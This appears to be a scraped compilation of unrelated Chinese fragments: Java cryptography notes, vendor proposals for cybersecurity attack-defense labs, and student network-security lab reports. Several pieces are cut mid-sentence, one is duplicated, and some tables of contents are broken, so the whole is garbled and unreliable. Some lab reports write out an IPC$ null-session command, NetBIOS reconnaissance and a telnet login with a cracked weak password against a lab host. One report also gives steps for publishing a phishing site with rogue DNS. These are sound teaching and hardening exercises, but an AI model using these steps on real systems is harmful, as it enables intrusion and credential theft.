的核心类和接口组。 一组证书管理类和接口。 一组封装 DSA 与 RSA 的公开和私有密钥的接口。 描述公开和私有密钥算法与参数指定的类和接口。用 JCA 提供的基本加密功能接口可以开发实现含消息摘要、数字签名、密钥生成、密钥转换、密钥库管理、证书管理和使用等功能的应用程序。 加密扩展(JCE,Java Cryptography Extension) 构 成 JCE 的类和接口: :提供对基本的标准加密算法的实现,包括 DEs,三重 DEs(Triple DEs),基于口令(PasswordBasedEncryptionstandard)的 DES,Blowfish。 ( 支持 Diffie 一 Hell-man 密钥。定义密钥规范与算法参数规范。 安全套接扩展(JSSE,Java Secure Socket1 Extension)JSSE 提供了实现 SSL 通信的标准 Java API。 JSSE 结构包括下列包: .包含 JSSE API 的一组核心类和接口。 天融信攻防演练平台&安全实验室建设方案 北京天融信科技有限公司 2013-04-19 目录 第1章综述 (4) 第2章实验室需求分析 (5) 2.1人才需求 (5) 2.2攻防需求 (5) 2.3研究需求 (5) 第3章实验室概述 (6) 3.1实验室网络结构 (6) 3.2实验室典型配置 (6) 第4章攻防演练系统系统介绍 (8) 4.1攻防演练系统系统概述 (8) 4.2攻防演练系统系统体系 (9) 第5章信息安全演练平台介绍 (10) 5.1应急响应流程 (10) 5.2演练事件 (11) 5.3.1信息篡改事件 (11) 5.3.2拒绝服务 (13) 5.3.3DNS劫持 (14) 5.3.4恶意代码 (15) 第6章信息安全研究实验室介绍 (18) 6.1渗透平台 (18) 6.2靶机平台 (19) 6.3监控平台 (20) 第7章方案优势和特点 (22) 7.1实验室优势 (22) 7.2实验室特点 (23) 7.3安全研究能力 (23) 7.4培训服务及认证 (24) 第8章电子政务网站检测案例.................................................................................... 错误!未定义书签。第9章实验室建设建议.. (26) 9.1实验室建设步骤 (26) 9.2实验室设备清单 (27) 第1章综述 为满足电信、军工、航天、网监、教育等行业对信息安全人才培养、攻防演练、安全研究等需求,北京天融信科技有限公司基于虚拟化技术开发了安全实训系统,并以此系统为核心打造了信息安全实验室。以下是系统主要特点: ?通过虚拟化模板快速模拟真实系统环境 通过融合虚拟网络和真实物理网络,简单拖拽即可快速搭建模拟业务系统环境,并在拓扑及配置出现问题时,方便快速恢复。 ?通过监控平台可实时观察测试情况 可通过实训系统监控平台、在线或远程的方式对所模拟的网络测试环境进行监控。 ?多种虚拟化主机和网络模板 ?网络拓扑所见即所得拖拽模式 ?和真实的网络可互通 ?整体测试环境可快速恢复 ?监控主机服务、进程及资源状态 ?监控网络协议 ?定义和捕获攻击行为 ?针对攻击行为报警 网络安全攻防实验室 建设方案 XXXX信息科学与工程学院 2020/2/28 目录 第一章网络安全人才需求 (3) 1.1网络安全现状 (3) 1.2国家正式颁布五级安全等级保护制度 (3) 1.3网络安全技术人才需求猛增 (4) 第二章网络安全技术教学存在的问题 (4) 2.1网络安全实验室的建设误区 (4) 2.2缺乏网络安全的师资力量 (4) 2.3缺乏实用性强的安全教材 (5) 第三章安全攻防实验室特点 (5) 3.1安全攻防实验室简介 (5) 第四章安全攻防实验室方案 (6) 4.1安全攻防实验室设备选型 (6) 4.1.1 传统安全设备 (6) 4.1.2 安全沙盒——使实验室具有攻防教学功能的独特产品 (6) 4.2安全攻防实验室拓扑图 (8) 4.3安全攻防实验室课程体系 (9) 4.3.1 初级DCNSA网络安全管理员课程 (9) 4.3.2 中级DCNSE网络安全工程师课程 (10) 4.4高级安全攻防实验室实验项目 (12) 4.4.1基本实验 (12) 4.4.1扩展实验 (14) 第七章网络实验室布局设计 (25) 7.1 实验室布局平面图 (25) 7.2 实验室布局效果图 (25) 7.3 机柜摆放位置的选择 (26) 第一章网络安全人才需求 1.1网络安全现状 信息技术飞速发展,各行各业对信息系统的依赖程度越来越高,建立持续、稳定、安全的网络是保障用户业务发展的前提。 近年来,安全问题却日益严重:病毒、木马、黑客攻击、网络钓鱼、DDOS 等安全威胁层出不穷,而且技术越来越复杂,病毒、木马及黑客技术等融合造成了网络安全的巨大危机。 用户都已经认识到了安全的重要性。纷纷采用防火墙、加密、身份认证、访问控制,备份等保护手段来保护信息系统的安全。 但是网络安全的技术支持以及安全管理人才极度缺乏。 1.2国家正式颁布五级安全等级保护制度 2007年7月24日,公安部、国家保密局、国家密码管理局、国务院信息工作办公室正式上线颁布了信息安全等级保护规定,信息安全等级保护管理办法及实施指南,颁布了《信息安全等级保护管理办法》、《信息系统安全等级保护定级指南》、《信息安全技术信息系统安全等级保护实施指南》、《信息安全技术信息系统安全等级保护基本要求》等办法。 办法明确规定,信息系统的安全保护等级分为五级,不同等级的信息系统应具备的基本安全保护能力如下: 第一级安全保护能力:应能够防护系统免受来自个人的、拥有很少资源的威胁源发起的恶意攻击、一般的自然灾难、以及其他相当危害程度的威胁所造成的关键资源损害,在系统遭到损害后,能够恢复部分功能。 第二级安全保护能力:应能够防护系统免受来自外部小型组织的、拥有少量资源的威胁源发起的恶意攻击、一般的自然灾难、以及其他相当危害程度的威胁所造成的重要资源损害,能够发现重要的安全漏洞和安全事件,在系统遭到损害后,能够在一段时间内恢复部分功能。 第三级安全保护能力:应能够在统一安全策略下防护系统免受来自外部有组织的团体、拥有较为丰富资源的威胁源发起的恶意攻击、较为严重的自然灾难、以及其他相当危害程度的威胁所造成的主要资源损害,能够发现安全漏洞和安全事件,在系统遭到损害后,能够较快恢复绝大部分功能。 第四级安全保护能力:应能够在统一安全策略下防护系统免受来自国家级别的、敌对组织的、拥有丰富资源的威胁源发起的恶意攻击、严重的自然灾难、以及其他相当危害程度 网络安全实验报告 姓名:杨瑞春 班级:自动化86 学号:08045009 实验一:网络命令操作与网络协议分析 一.实验目的: 1.熟悉网络基本命令的操作与功能。 2.熟练使用网络协议分析软件ethereal分析应用协议。 二.实验步骤: 1. ping tracert netstat ipconfig telnet netcat Arp route nslookup Ssh 2.协议分析软件:ethereal的主要功能:设置流量过滤条件,分析网络数据包, 流重组功能,协议分析。 三.实验任务: 1.跟踪某一网站如google的路由路径 2.查看本机的MAC地址,ip地址 输入ipconfig /all 找见本地连接. Description . . .. . : SiS 900-Based PCI Fast Ethernet Adapte Physical Address.. . : 00-13-8F-07-3A-57 DHCP Enabled. . .. . : No IP Address. . . .. . : 192.168.1.5 Subnet Mask . . .. . : 255.255.255.0 Default Gateway .. . : 192.168.1.1 DNS Servers . . .. . : 61.128.128.67 192.168.1.1 Default Gateway .. . : 192.168.1.1 这项是网关.也就是路由器IP Physical Address.. . : 00-13-8F-07-3A-57 这项就是MAC地址了. 一Sniffer 软件的安装和使用 一、实验目的 1. 学会在windows环境下安装Sniffer; 2. 熟练掌握Sniffer的使用; 3. 要求能够熟练运用sniffer捕获报文,结合以太网的相关知识,分析一个自己捕获的以太网的帧结构。 二、实验仪器与器材 装有Windows操作系统的PC机,能互相访问,组成局域网。 三、实验原理 Sniffer程序是一种利用以太网的特性把网络适配卡(NIC,一般为以太同卡)置为杂乱模式状态的工具,一旦同卡设置为这种模式,它就能接收传输在网络上的每一个信息包。 四、实验过程与测试数据 1、软件安装 按照常规方法安装Sniffer pro 软件 在使用sniffer pro时需要将网卡的监听模式切换为混杂,按照提示操作即可。 2、使用sniffer查询流量信息: 第一步:默认情况下sniffer pro会自动选择网卡进行监听,手动方法是通过软件的file 菜单下的select settings来完成。 第二步:在settings窗口中我们选择准备监听的那块网卡,把右下角的“LOG ON”勾上,“确定”按钮即可。 第四步:在三个仪表盘下面是对网络流量,数据错误以及数据包大小情况的绘制图。 第五步:通过FTP来下载大量数据,通过sniffer pro来查看本地网络流量情况,FTP 下载速度接近4Mb/s。 第六步:网络传输速度提高后在sniffer pro中的显示也有了很大变化,utiliazation使用百分率一下到达了30%左右,由于我们100M网卡的理论最大传输速度为12.5Mb/s,所以4Mb/s刚好接近这个值的30%,实际结果和理论符合。 第七步:仪表上面的“set thresholds”按钮了,可以对所有参数的名称和最大显示上限进行设置。 第八步:仪表下的“Detail”按钮来查看具体详细信息。 第九步:在host table界面,我们可以看到本机和网络中其他地址的数据交换情况。 网络安全实验报告 务书 一、目的与要求根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上,能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各类安全问题,维护网络及操作系统的安全。 二、主要内容实验一加密认证通信系统实现设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语言不限,可以直接调用现有模块,认证和加密不限)实验二 综合扫描及安全评估利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从而提高系统的安全性能。实验三 网络攻防技术矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地解决各种威胁。实验四 Windows系统安全配置方案作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往忽视了OS的安 全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵检测软件来加强系统的安全。其中实验一要求编程实现,可直接调用相关功能函数完成。实验二至实验四可在机房的网络信息安全综合实验系统上完成。 三、进度计划序号设计(实验)内容完成时间备注1接受任务,查阅文献,开始实现密码算法和认证算法第一天2完成加密认证通信系统第二至七天3上午完成综合扫描及安全评估实验,下午进行网络攻防实验第八天4上午完成网络攻防实验,下午进行系统安全配置实验第九天5撰写实验报告并验收第天 四、实验成果要求 1、要求程序能正常运行,并实现任务书要求功能。 2、完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重对设计思路的归纳和对问题解决过程的总结。 五、考核方式平时成绩+程序验收+实验报告。 学生姓名: 指导教师:xx 年6 月13 日实验报告题目: 网络信息安全综合实验院系: 计算机系班级: 网络安全实验室方案 书 网络安全实验室方案书 一、认证课程与学校网络安全实验室建立的关系: 学校建立网络安全实验室的同时,即可引进TCSE课程,实验室与网络安全相关课程紧密结合,构建完善的网络安全教学体系。 趋势科技网络安全实验室参照学校网络专业的建设要求,结合学校认同的趋势科技TCSP-TCSE认证课程体系的专业教学要求,严格把关,层层审核,使用我们公司的最新硬件设备及软件产品来搭建而成。认证课程方案授权范围内包含我们的专业实验设备(具体产品可根据实际需要调节)。 若学校有一定的网络安全实验室建设需要,完整的趋势科技实验室设备随时恭候您的选购,并在专业领域权威性的技术带领下,提供学校一套完善而优秀的实验课程认证体系,附赠免费的全套技术支持。倘若学校有其他实验室教学要求没有采纳我们整体TCSP-TCSER 认证课程体系,也可以单独采购部分硬件设备。 二、搭建网络实验室的重要性 1、实际的动手操作能力 随着就业竞争力的不断加大,各高校不断加强学生的专业知识训练。对于计算机专业的学生,他们更需要“强理论知识+动手实践”的训练方式,单一的理论知识已不足已他们在职场上占据竞争优势。现在有的培训机构由于没有整体的教学实验环境或实验设备不足,学生毕业后匆匆来到相关企业实习,发现“信息系统”早已演变为企业的命脉,这时他们正想投身回报社会,不巧被高级网管叫“停”,由于信息的安全性和敏感性,网络系统通常有层层密码保护,不仅企业内部的一般网管无法进入运行中的重要系统,外来实习人员更无法接触到运行中的关键设备和整个网络系统的核心技术。正常运行中的网络系统不可能让实习生当成训练场,结局自然就只能远远看着机房……为了扭转这种局势,高校必须配备同比企业的项目和工程的实验环境,使学生有充分动手的机会,占据就业竞争优势。 信息与工控系统安全实验室 规划方案 目录 1.术语、定义和缩略语 (1) 2.信息与工控系统安全实验室概述 (1) 2.1信息与工控系统安全实验室建设背景 (1) 2.1.1 信息系统现状及主要威胁 (1) 2.1.2 工控系统现状及主要威胁 (2) 2.1.3信息与工控系统安全实验室建设目的及意义 (4) 3.信息与工控系统安全实验室主要研究方向和实验内容 (5) 3.1信息安全实验室主要研究方向和实验内容 (5) 3.1.1 操作系统安全研究方向和实验内容 (5) 3.1.2 数据库安全机制研究方向和实验内容 (6) 3.1.3 身份认证研究方向和实验内容 (7) 3.1.4 计算机病毒攻防研究方向和实验内容 (7) 3.2网络安全主要研究方向和实验内容 (7) 3.2.1 入侵检测与攻防研究方向和实验内容 (8) 3.2.2 防火墙研究方向和实验内容 (8) 3.2.3 漏洞扫描研究方向和实验内容 (9) 3.2.4 WEB攻防研究方向和实验内容 (9) 3.2.5 无线攻防研究方向和实验内容 (9) 3.3工控安全研究方向和实验内容 (10) 3.3.1 工控系统漏洞挖掘研究方向和实验内容 (10) 3.3.2 工控系统攻防研究方向和实验内容 (11) 3.3.3 安全DCS、PLC、SCADA系统研究方向和实验内容 (11) 3.3.4 企业工控安全咨询评估 (12) 3.3.5企业工控安全培训 (12) 3.3.6 对外交流和联合研究 (12) 4.信息与工控系统安全实验室组织与运行 (13) 5.信息与工控系统安全实验室建设计划.................................................................... 错误!未定义书签。 网络安全实验室方案书 一、认证课程与学校网络安全实验室建立的关系: 学校建立网络安全实验室的同时,即可引进TCSE课程,实验室与网络安全相关课程紧密结合,构建完善的网络安全教学体系。 趋势科技网络安全实验室参照学校网络专业的建设要求,结合学校认同的趋势科技TCSP-TCSE认证课程体系的专业教学要求,严格把关,层层审核,使用我们公司的最新硬件设备及软件产品来搭建而成。认证课程方案授权范围内包含我们的专业实验设备(具体产品可根据实际需要调节)。 若学校有一定的网络安全实验室建设需要,完整的趋势科技实验室设备随时恭候您的选购,并在专业领域权威性的技术带领下,提供学校一套完善而优秀的实验课程认证体系,附赠免费的全套技术支持。倘若学校有其他实验室教学要求没有采纳我们整体TCSP-TCSER认证课程体系,也可以单独采购部分硬件设备。 二、搭建网络实验室的重要性 1、实际的动手操作能力 随着就业竞争力的不断加大,各高校不断加强学生的专业知识训练。对于计算机专业的学生,他们更需要“强理论知识+动手实践”的训练方式,单一的理论知识已不足已他们在职场上占据竞争优势。现在有的培训机构由于没有整体的教学实验环境或实验设备不足,学生毕业后匆匆来到相关企业实习,发现“信息系统”早已演变为企业的命脉,这时他们正想投身回报社会,不巧被高级网管叫“停”,由于信息的安全性和敏感性,网络系统通常有层层密码保护,不仅企业内部的一般网管无法进入运行中的重要系统,外来实习人员更无法接触到运行中的关键设备和整个网络系统的核心技术。正常运行中的网络系统不可能让实习生当成训练场,结局自然就只能远远看着机房……为了扭转这种局势,高校必须配备同比企业的项目和工程的实验环境,使学生有充分动手的机会,占据就业竞争优势。 2、课程与网络安全实验室的紧密结合 趋势科技设计的网络环境中体现了防病毒体系的完整性,分别从网关、网络层、服务器和客户端多层次部署了病毒安全防御产品,从病毒防御架构上给予学生一个完整的防御体系概念,在课程当中也将结合这些产品进行病毒实验。 趋势科技从企业实际角度出发,根据学校的情况为学校推荐了一些软硬件产品建立网络安全实验室,实验室中可以进行基本的网络安全环境搭建、设置与部署,课程与网络安全实验室紧密结合。 3、提升学校的教学水平与专业影响 引入趋势TCSE网络安全实验室,可以举办面向本校学生和外校学生为培训对象的短期培训班,既增 网络安全实验心得 一实验名称 系统主机加固 二实验目的 熟悉windows操作系统的漏洞扫描工具 了解Linux操作系统的安全操作三实验步骤 Windows主机加固 一.漏洞扫描及测试 2.漏洞测试 (1)主机A建立ipc$空连接 net use \\100.10.1.2\ipc$“” /user:”” (2)主机A通过NetBIOS获得主机B信息 主机A在命令行下执行如下命令:nbtstat –A 100.10.1.2 获得主机B的信息包括:主机名:HOST7D MAC地址:00-0C-29-31-8D-8F (3)主机A通过telnet远程登录主机B 主机A在命令行下执行如下命令:telnet 100.10.1.2 输入“n”|“Enter”,利用扫描到的弱口令用户,登录主机B。 在主机B的D盘下新建名称为“jlcss”的文件夹,命令为d: 和mkdir jlcss 主机B查看D盘出现了名为“jlcss”的文件夹,文件夹创建时间为2016-5-16 9:30 (4)主机A通过ftp访问主机B 主机A打开IE浏览器,在地址栏中输入“ftp://主机B的IP地址”,可以访问二.安全加固实施 1.分析检测报告 2.关闭ipc$空连接 主机A建立ipc$空连接,命令如下:net use \\100.10.1.2\ipc$“” /user:”” 出现提示:命令成功完成 3.禁用NetBIOS 主机A通过NetBIOS获取主机B信息,在命令行下执行如下命令: nbtstat –A 100.10.1.2 出现提示:Host not found 4.关闭445端口 (1)验证445端口是否开启 主机B在命令行中输入如下命令:netstat -an 查看到445端口处于Listening: (2)若主机不需要文件共享服务,可以通过修改注册表来屏蔽445端口 主机B执行如下命令:netstat -an 此时445端口未开启 5.禁止Telnet服务。 主机A重新telnet 主机B,出现提示 6.禁止ftp服务 主机B查看21端口是否关闭,在命令行下执行如下命令: netstat –an 主机B的21端口已关闭 主机A通过ftp访问主机B 提示无法与服务器建立连接 7.修改存在弱口令账号:net user test jlcssadmin 三.加固测试 (1)主机A使用X-Scan再次对主机B进行扫描,根据本次检测报告,对比第一次生成的 Linux主机加固 一.使用xinetd实施主机访问控制 1.telnet服务的参数配置 (1)telnet远程登录同组主机(用户名guest,口令guestpass),确定登录成功。 (2)查看本机网络监听状态,输入命令netstat -natp。回答下列问题: telnet监听端口:23 telnet服务守护进程名:xinetd (3)使用vim编辑器打开/etc/xinetd.d/telnet文件,解释telnet服务配置项,并填写表12-2-3。 XXX学校信息安全实验室 设计方案 北京网御星云信息技术有限公司 2014-03-30 目录 一、概述................................................................................................ - 3 - 二、设计目的........................................................................................... - 4 - 三、总体架构........................................................................................... - 4 - 3.1、所需软硬件................................................................................ - 5 - 3.2、培训 ......................................................................................... - 6 - 3.3、实验教材................................................................................... - 6 - 3.4、产品报价................................................................................... - 6 - 四、实验和演练........................................................................................ - 6 - 4.1、网御安全综合网关技术实验.......................................................... - 6 - 4.2、网御入侵检测技术实验 ................................................................ - 7 - 4.3、网御漏洞扫描系统实验 ................................................................ - 7 - 石河子大学信息科学与技术学院 网络安全课程实验 实验名称:使用任选工具进行网络检测与扫描 学生姓名:刘金红 学号:05 学院:信息科学与技术学院 专业年级:计算机科学与技术专业2012级 指导教师:曹传东老师 完成日期: 目录 1 实验环境 .......................................................................................................错误!未定义书签。 2 实验目的 .......................................................................................................错误!未定义书签。 3 实验步骤 .......................................................................................................错误!未定义书签。 4 实验内容 .......................................................................................................错误!未定义书签。 DOS窗口中常用网络命令的操作使用及IPCS攻击实践.....................错误!未定义书签。 DOS窗口中ping 命令及其常见带参数子命令的用法实践......错误!未定义书签。 DOS窗口中IPconfig 命令及其常见带参数子命令的用法实践 ..错误!未定义书签。 DOS窗口中nslookup命令及其常见带参数子命令的用法实践 .错误!未定义书签。 DOS窗口中netstat命令及其常见带参数子命令的用法实践.....错误!未定义书签。 DOS窗口中arp命令及其常见带参数子命令的用法实践...........错误!未定义书签。 DOS窗口中route命令及其常见带参数子命令的用法实践 .......错误!未定义书签。 DOS窗口中tracert命令及其常见带参数子命令的用法实践 .....错误!未定义书签。 DOS窗口中ftp命令及其常见带参数子命令的用法实践 ...........错误!未定义书签。 DOS窗口中telnet命令及其常见带参数子命令的用法实践 ......错误!未定义书签。 DOS窗口中sc命令及其常见带参数子命令的用法实践.............错误!未定义书签。 DOS窗口中nbtstat命令及其常见带参数子命令的用法实践 ....错误!未定义书签。 DOS窗口中net命令及其常见带参数子命令的用法实践...........错误!未定义书签。 DOS窗口中at命令及其常见带参数子命令的用法实践.............错误!未定义书签。 使用课本第四章各案例中介绍的工具软件进行网络信息收集和扫描检测错误!未定义书签。 在虚拟机系统Window200x中使用GetNTuser工具扫描本机系统上存在的用户名,并猜解其中具有空密码和弱口令的用户;在该软件中使用自定义字典文件穷举 猜解某个用户的口令(爆破);......................................................错误!未定义书签。 使用Port Scan 工具软件进行对某目标机开放端口的扫描;....错误!未定义书签。 在虚拟机系统中使用Shed 工具软件扫描某个目标主机的共享目录信息;错误! 未定义书签。 编译执行课本中案例4-4介绍的代码,并利用抓包工具进行验证;错误!未定义书 签。 使用漏洞扫描工具X-Scan对指定IP 地址段或单机进行全面的安全漏洞扫描和检 测;....................................................................................................错误!未定义书签。 使用嗅探工具Win Sniffer 监听客户端登陆FTP服务器的用户和密码信息;错误! 未定义书签。 使用自选的任一款扫描工具进行网络攻击前的信息收集 ....................错误!未定义书签。 使用CIS工具对本机系统进行安全风险评估...............................错误!未定义书签。 使用Superscan扫描工具实现秘密端口扫描 ...............................错误!未定义书签。 实验一:使用任选工具软件进行网络检测和扫描 1 实验环境 1台带有活动网络连接(插有网卡且工作正常)、安装有VMware虚拟机软件的PC机,其中主机环境配置如表1-1所示: 表1-1 本机环境:主机操作系统的配置(作为客户机端) 面向攻防实战的信息安全实验室建设方案 引言Introduction 为满足军工、航天、网警、电信、教育等行业对信息安全人才培养、攻防演练、安全研究等需求,天融信科技基于虚拟化技术开发了攻防演练系统,并以此系统为核心打造了面向攻防实战的信息安全实验室。 需求分析Needs Analysis 安全研究:以行业信息化、网络安全、为主要出发点、重点研究信息管理和安全应用,建设新技术开发与验证平台,研究信息安全取证、破译、解密等技术。并负责对电子数据证据进行取证和技术鉴定。 安全研究实验室示意图 应急演练:随着信息安全的日益发展,网络新型攻击和病毒形式日益恶化,因此以安全运维、快速响应为目标,以信息网络技术为主要手段,提高在网络空间开展信息监察、预防、提高突发事件的处理能力。 攻防演练实验室示意图 人才培养:近年来,信息技术已在人类的生产生活中发挥至关重要的作用,随之而来的信息安全问题也已成为关系国家安全、经济发展和社会稳定的关键性问题。但由于国专门从事信息安全工作技术人才严重短缺,阻碍了我国信息安全 事业的发展 信息安全实验室示意图 解决方案Solution 天融信基于攻防演练系统和在信息安全技术方面的研究,全力打造出基于安全研究、应急演练、人才培养所需要的信息安全实验室,实验室分为5 个区域:信息安全研究区域、信息安全演练区域、信息安全设备接入区域、竞赛与管理区域和远程接入区域。 实验室网络拓扑结构 信息安全攻防演练系统(Topsec-SP):是通过多台专用信息安全虚拟化设备,虚拟出信息安全所需的场景,例如WEB 攻防平台、应用攻防平台、威胁分析平台、数据挖掘平台、基线扫描平台、漏洞分析平台、木马分析平台等等。同时系统提供相实验指导书和实验环境场景。 信息安全研究平台(Topsec-CP):是通过智能信息安全靶机系统、信息安全智能渗透系统和信息安全监控系统实现红、蓝对战实战。并对实战过程进行监控,实现测试过程和结果动态显示。 实验室设备接入区:是能够满足用户在演练和实战时通过接入特殊设备来完成用户自定义的实验需求,例如UTM、IDS、漏扫、AIX、HP-Unix 等通过虚拟化技术无法完成的设备。 测试、培训、研究和管理区:相关人员通过B/S 做培训、研究和管理所用。 远程接入区:能够满足用户通过远程接入到信息安全实验室,进行7*24 小时的测试和研究。 XX大学 本科实验报告 课程名称:网络安全技术 1421351 学号: XXX 姓名: 网络工程专业: 班级:网络B14-1 指导教师: 课内实验目录及成绩 信息技术学院 2017年10 月27 日 XX大学实验报告 课程名称:计算机信息安全实验类型:演示、验证 实验项目名称:实验七计算机及手机病毒防范 实验地点:信息楼320 实验日期:2017 年10月27 日 1.实验目的 360安全卫士及杀毒软件的实验目的主要包括: 1)理解360安全卫士及杀毒软件的主要功能及特点。 2)掌握360安全卫士及杀毒软件主要技术和应用。 3)熟悉360安全卫士及杀毒软件主要操作界面和方法。 2. 实验内容 (1)主要实验内容 360安全卫士及杀毒软件的实验内容主要包括: ①360安全卫士及杀毒软件的主要功能及特点。 ②360安全卫士及杀毒软件主要技术和应用。 ③360安全卫士及杀毒软件主要操作界面和方法。 实验用时:2学时(90-120分钟) (2)360安全卫士主要功能特点 360安全卫士是奇虎自主研发的软件一款电脑安全辅助软件,拥有查杀木马、清理插件、修复漏洞、电脑体检等多种功能,并独创了“木马防火墙”功能,依靠抢先侦测和云端鉴别,可全面、智能地拦截各类木马,保护用户的账号、隐私等重要信息。目前木马威胁之大已远超病毒,360安全卫士运用云安全技术,在拦截和查杀木马的效果、速度以及专业性上表现出色,能有效防止个人数据和隐私被木马窃取,被誉为“防范木马的第一选择”。360安全卫士自身非常轻巧,同时还具备开机加速、垃圾清理等多种系统优化功能,可大大加快电脑运行速度,内含的360软件管家还可帮助用户轻松下载、升级和强力卸载各种应用软件。360安全卫士的主要功能: ①电脑体检。可对用户电脑进行安全方面的全面细致检测。 ②查杀木马。使用360云引擎、启发式引擎、本地引擎、360奇虎支持向量机QVM(Qihoo Support Vector Machine)四引擎毒查杀木马。 ③修复漏洞。为系统修复高危漏洞、加固和功能性更新。 ④系统修复。修复常见的上网设置和系统设置。 ⑤电脑清理。清理插件、清理垃圾和清理痕迹并清理注册表。 ⑥优化加速。通过系统优化,加快开机和运行速度。 ⑦电脑门诊。解决电脑使用过程中遇到的有关问题帮助。 ⑧软件管家。安全下载常用软件,提供便利的小工具。 ⑨功能大全。提供各式各样的与安全防御有关的功能。 360安全卫士将木马防火墙、网盾及安全保镖合三为一,安全防护体系功能大幅增强。具有查杀木马及病毒、清理插件、修复及危险项漏洞、电脑体检、开机加速等多种功能,并独创了“木马防火墙”功能,利用提前侦测和云端鉴别,可全面、智能地拦截各类木马,保护用户的账号、隐私等重要信息。运用云安全技术,在拦截和查杀木马的效果、速度以及专 网络攻防实验室 需求分析 信息安全领域中,网络安全问题尤为突出。目前,危害信息安全的主要威胁来自基于网络的攻击。随着网络安全问题的层出不穷,网络安全人才短缺的问题亟待解决。在我国,高校是培养网络安全人才的培养的核心力量,网络安全课程是信息安全相关专业的核心课程和主干课程。网络攻击与防护是网络安全的核心内容,也是国内外各个高校信息安全相关专业的重点教学内容。网络攻击与防护是应用性、实践性、工程性、综合性最强的一部分核心内容,对实验环境提出了更高的要求。为全面提高学生的信息安全意识和网络攻防实践能力,学校建立专业的网络攻防实验室是十分必要的。 西普科技建议学校建设一个专业的、开放的网络攻防实验室,来需满足专业课程综合实践教学、学生安全防护能力和安全意识提升、跟踪最新网络安全技术和提升学校及专业影响力等具体需要。实验室可承担网络安全相关的课程实验、技能实训实习、综合实训、教师项目开发以及校内外竞赛等任务。综上,网络攻防实验室需提供以下支持: 1. 攻防基础知识技能学习所需的实验环境、工具及指导 2. 真实的攻防实战环境供学生进行综合训练 3. 渗透测试及网络防护实训的真实环境与指导 4. 提供网络攻防领域科研所需的环境与工具 5. 提供开放接口及系统扩展接口 6. 支持持续性实验室运营,如培训基地建设、横向课题及安全竞赛组织等 总体规划 为满足校方对网络攻防实验室建设的软硬件设备采购、实验室运营管理、实验课程体系建设、师资培养、学生实习实训及竞赛组织等多方面的需求,西普科技提供一套完整的网络攻防实验室建设方案,整体框架如下图所示。实验室包括进阶式的三大实验平台,支持从基础到实训再到实战的实验模式,提供从系统攻击到全面防护的环境支持及实验指导;同时满足学校实验室增值的需求。西普科技从总体上对实验室进行了中长期的建设规划,根据学校实验室建设的各期经费预算,不断完善,从而实现实验室的可持续性发展。 网络安全实验报告 学号:姓名:班级: 实验项目编号:B0 实验项目名称:钓鱼式攻击手法 一、实验目的: 1.了解钓鱼攻击的概念和实现原理。 2.了解钓鱼网站和正常网站的区别。 3.提高抵御钓鱼攻击的能力。 二、实验环境: 网络安全实验平台(装有windows、 linux等多个系统虚拟机及相应软件) 三、实验原理(或要求): 网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮 件,意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATM PIN码或信 用卡详细信息)的一种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通 过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上 输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。这些个人信息对黑 客们具有非常大的吸引力,因为这些信息使得他们可以假冒受害者进行欺诈性金 融交易,从而获得经济利益。受害者经常遭受严重的经济损失或个人信息被窃取。 四、实验步骤: 1.主机A(钓鱼网站,黑客)的操作 (1) 主机A配置Outlook Express邮箱,建立邮件帐户 . (2) 更改钓鱼网站源码中接收邮件的邮箱进入钓鱼网站目录 “D:\ExpNIC\SocEng\Web\Fishing\钓鱼网站\qqqet”,点击右键使用UltraEdit 打开,如图所示: (3) 发布钓鱼网站。单击“开始”|“程序”|“管理工具”| “Internet 信息服务(IIS)管理器”,启动钓鱼网站。 (4) 主机A配置DNS服务器为主机B的ip。 2.主机B(正常网站,DNS服务器)的操作 (1) 安装DNS 点击“开始”|“设置”|“控制面板”|“添加或删除程序”|“添加/删除Windows组件(A)”,弹出“Windows组件向导”的窗口,在组件中将鼠标焦点定位到“网络服务”的选项上, 点击“详细信息”,然后在网络服务的子组件中选择域名系统(DNS),选择后点击“确定”。点击“下一步”,进入安装界面,点击“完成”,完成安装。 (2) 配置DNS,具体步骤: 单击“开始”|“程序”|“管理工具”|“DNS”,进入DNS配置界面,点击主机展开树. 右键点击“正向查找区域”,选择新建区域,弹出新建区域向导,点击“下一步”,然后选择默认的主要区域,继续点击“下一步”。在区域名称处填写“,一直点击“下一步”,最后点击“完成”。右键点击“,选择新建主 一、网络攻防实验室建设背景 1.1市场人才需求分析 网络技术的发展在创造了便捷性的同时,也把数以十亿计的用户带入了一个两难的境地,一方面,国家和政府依赖网络维持政治、经济、文化、军事等各项活动的正常运转,企业用户依赖网络进行技术创新和市场拓展,个人用户依赖网络进行信息交互;另一方面,网络中存储、处理和传输的都是事关国家安全、企业及个人的机密信息或是敏感信息,因此成为敌对势力、不法分子的攻击目标。这种不安全的态势在可见的未来绝对不会平息,而是会持续发展,逐渐渗透到物联网、智能移动网、云网络等新兴的网络空间。 